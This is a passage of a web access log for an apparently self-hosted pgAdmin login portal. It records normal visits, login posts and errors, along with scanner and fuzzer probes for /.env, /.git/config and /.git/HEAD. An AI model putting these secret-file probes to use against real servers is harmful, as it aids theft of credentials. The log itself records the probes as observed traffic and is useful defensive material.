Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[13/Jan/2026:08:21:04 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/security.pages.js?ver=91100" [Client 84.1.26.27] [Length 134798] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[13/Jan/2026:08:21:04 +0000] - 200 200 - GET https db.profibot.hu "/static/favicon.ico?ver=91100" [Client 84.1.26.27] [Length 78998] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[13/Jan/2026:08:21:04 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[13/Jan/2026:08:21:04 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 3738] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[13/Jan/2026:08:21:04 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/fonts/Roboto-Regular..ttf" [Client 84.1.26.27] [Length 171676] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/static/js/generated/style.css?ver=91100" +[13/Jan/2026:08:22:12 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 84.1.26.27] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[13/Jan/2026:08:22:12 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 84.1.26.27] [Length 2494] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[13/Jan/2026:08:22:13 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 3738] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[13/Jan/2026:08:22:13 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[13/Jan/2026:14:51:21 +0000] - 404 404 - GET https db.profibot.hu "/robots.txt" [Client 34.222.195.126] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[13/Jan/2026:14:51:21 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 34.222.195.126] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[13/Jan/2026:14:51:22 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 34.222.195.126] [Length 2423] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[13/Jan/2026:18:45:43 +0000] - - 301 - GET http db.profibot.hu "/" [Client 72.11.155.223] [Length 166] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "-" +[13/Jan/2026:18:45:44 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 72.11.155.223] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "http://db.profibot.hu/" +[13/Jan/2026:18:45:44 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 72.11.155.223] [Length 2387] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "https://db.profibot.hu/" +[15/Jan/2026:04:32:38 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 84.254.106.197] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:32:38 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 84.254.106.197] [Length 2389] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/" +[15/Jan/2026:04:32:38 +0000] - 404 404 - GET https db.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:32:38 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico?ver=91100" [Client 84.254.106.197] [Length 245] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:32:38 +0000] - 200 200 - GET https db.profibot.hu "/static/favicon.ico?ver=91100" [Client 84.254.106.197] [Length 78998] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/favicon.ico?ver=91100" +[15/Jan/2026:04:32:39 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.others.js?ver=91100" [Client 84.254.106.197] [Length 2829659] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:32:39 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/style.css?ver=91100" [Client 84.254.106.197] [Length 88521] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:32:39 +0000] - 404 404 - GET https db.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:32:39 +0000] - 404 404 - GET https db.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:32:39 +0000] - 200 200 - GET https db.profibot.hu "/static/vendor/require/require.min.js?ver=91100" [Client 84.254.106.197] [Length 6762] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:32:39 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.react.js?ver=91100" [Client 84.254.106.197] [Length 172153] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:32:39 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.sqleditor.js?ver=91100" [Client 84.254.106.197] [Length 173618] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:32:39 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.main.js?ver=91100" [Client 84.254.106.197] [Length 396298] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:04:32:40 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/pgadmin_commons.js?ver=91100" [Client 84.254.106.197] [Length 5643] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[15/Jan/2026:18:07:05 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 204.76.203.25] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[15/Jan/2026:18:07:05 +0000] - 200 200 - GET https db.profibot.hu "/login" [Client 204.76.203.25] [Length 6219] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[16/Jan/2026:00:33:24 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 167.94.146.59] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[16/Jan/2026:00:33:24 +0000] - 200 200 - GET https db.profibot.hu "/login" [Client 167.94.146.59] [Length 2388] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[16/Jan/2026:00:33:24 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico?ver=91100" [Client 167.94.146.59] [Length 245] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[16/Jan/2026:00:33:24 +0000] - 200 200 - GET https db.profibot.hu "/static/favicon.ico?ver=91100" [Client 167.94.146.59] [Length 78998] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "https://db.profibot.hu/favicon.ico?ver=91100" +[16/Jan/2026:00:33:25 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico" [Client 167.94.146.59] [Length 245] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[16/Jan/2026:00:33:25 +0000] - 200 200 - GET https db.profibot.hu "/static/favicon.ico?ver=91100" [Client 167.94.146.59] [Length 78998] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "https://db.profibot.hu/favicon.ico" +[16/Jan/2026:01:17:00 +0000] - - 301 - GET http db.profibot.hu "/" [Client 162.142.125.220] [Length 166] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[16/Jan/2026:02:09:37 +0000] - 404 404 - GET https db.profibot.hu "/.git/config" [Client 195.178.110.191] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" "-" +[16/Jan/2026:18:10:38 +0000] - - 301 - GET http db.profibot.hu "/" [Client 34.168.19.212] [Length 166] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[16/Jan/2026:18:10:38 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 34.168.19.212] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://db.profibot.hu" +[16/Jan/2026:18:10:38 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 34.168.19.212] [Length 2390] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "https://db.profibot.hu/" +[16/Jan/2026:20:10:21 +0000] - - 301 - GET http db.profibot.hu "/" [Client 34.86.5.147] [Length 166] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[16/Jan/2026:20:10:21 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 34.86.5.147] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://db.profibot.hu" +[16/Jan/2026:20:10:21 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 34.86.5.147] [Length 2390] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "https://db.profibot.hu/" +[17/Jan/2026:18:28:05 +0000] - - 301 - GET http db.profibot.hu "/" [Client 178.128.47.203] [Length 166] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[17/Jan/2026:18:28:05 +0000] - - 301 - GET http db.profibot.hu "/favicon.ico" [Client 178.128.47.203] [Length 166] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "http://db.profibot.hu/" +[17/Jan/2026:18:28:05 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 178.128.47.203] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[17/Jan/2026:18:28:08 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 178.128.47.203] [Length 2421] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[17/Jan/2026:18:28:08 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico" [Client 178.128.47.203] [Length 245] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[18/Jan/2026:00:34:55 +0000] - 404 404 - GET https db.profibot.hu "/.git/HEAD" [Client 130.49.216.53] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Fuzz Faster U Fool v2.1.0-dev" "-" +[18/Jan/2026:14:15:15 +0000] - 404 404 - GET https db.profibot.hu "/.env" [Client 204.76.203.25] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[19/Jan/2026:21:47:08 +0000] - 504 504 - GET https db.profibot.hu "/" [Client 37.76.9.111] [Length 566] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:21:47:25 +0000] - - 499 - GET https db.profibot.hu "/" [Client 66.249.93.161] [Length 0] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[19/Jan/2026:21:47:40 +0000] - - 499 - GET https db.profibot.hu "/" [Client 66.249.88.164] [Length 0] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[19/Jan/2026:21:47:40 +0000] - - 499 - GET https db.profibot.hu "/" [Client 66.102.8.225] [Length 0] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[19/Jan/2026:21:47:56 +0000] - - 499 - GET https db.profibot.hu "/favicon.ico" [Client 37.76.9.111] [Length 0] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/" +[19/Jan/2026:21:57:19 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 37.76.9.111] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:21:57:19 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 37.76.9.111] [Length 2493] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:21:57:20 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico?ver=91100" [Client 37.76.9.111] [Length 245] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[19/Jan/2026:21:57:20 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.9.111] [Length 3738] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[19/Jan/2026:21:57:20 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.9.111] [Length 321] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[19/Jan/2026:21:57:56 +0000] - 302 302 - POST https db.profibot.hu "/authenticate/login" [Client 37.76.9.111] [Length 199] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[19/Jan/2026:21:57:56 +0000] - 200 200 - GET https db.profibot.hu "/login" [Client 37.76.9.111] [Length 2490] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[19/Jan/2026:21:57:56 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.9.111] [Length 321] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login" +[19/Jan/2026:21:57:56 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.9.111] [Length 3738] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login" +[19/Jan/2026:21:58:08 +0000] - 302 302 - POST https db.profibot.hu "/authenticate/login" [Client 37.76.9.111] [Length 199] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login" +[19/Jan/2026:21:58:08 +0000] - 200 200 - GET https db.profibot.hu "/login" [Client 37.76.9.111] [Length 2491] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login" +[19/Jan/2026:21:58:09 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.9.111] [Length 3738] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login" +[19/Jan/2026:21:58:09 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.9.111] [Length 321] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login" +[20/Jan/2026:06:46:22 +0000] - 502 502 - GET https db.profibot.hu "/" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[20/Jan/2026:06:46:22 +0000] - 502 502 - GET https db.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/" +[20/Jan/2026:06:46:59 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 37.76.14.66] [Length 205] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:06:46:59 +0000] - 502 502 - GET https db.profibot.hu "/browser/" [Client 37.76.14.66] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:06:47:00 +0000] - 502 502 - GET https db.profibot.hu "/" [Client 37.76.14.66] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[20/Jan/2026:06:47:00 +0000] - 502 502 - GET https db.profibot.hu "/favicon.ico" [Client 37.76.14.66] [Length 556] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/" +[20/Jan/2026:06:55:39 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 84.1.26.27] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[20/Jan/2026:06:55:39 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 84.1.26.27] [Length 2495] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[20/Jan/2026:06:55:39 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/style.css?ver=91100" [Client 84.1.26.27] [Length 91437] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:06:55:39 +0000] - 200 200 - GET https db.profibot.hu "/static/vendor/require/require.min.js?ver=91100" [Client 84.1.26.27] [Length 7187] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:06:55:39 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.react.js?ver=91100" [Client 84.1.26.27] [Length 153691] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:06:55:39 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.main.js?ver=91100" [Client 84.1.26.27] [Length 323675] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:06:55:39 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/pgadmin_commons.js?ver=91100" [Client 84.1.26.27] [Length 5996] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:06:55:39 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.sqleditor.js?ver=91100" [Client 84.1.26.27] [Length 172313] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:06:55:39 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.others.js?ver=91100" [Client 84.1.26.27] [Length 2351296] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:06:55:39 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/security.pages.js?ver=91100" [Client 84.1.26.27] [Length 134798] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[20/Jan/2026:06:55:39 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/fonts/Roboto-Regular..ttf" [Client 84.1.26.27] [Length 171676] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/static/js/generated/style.css?ver=91100" +[20/Jan/2026:06:55:39 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 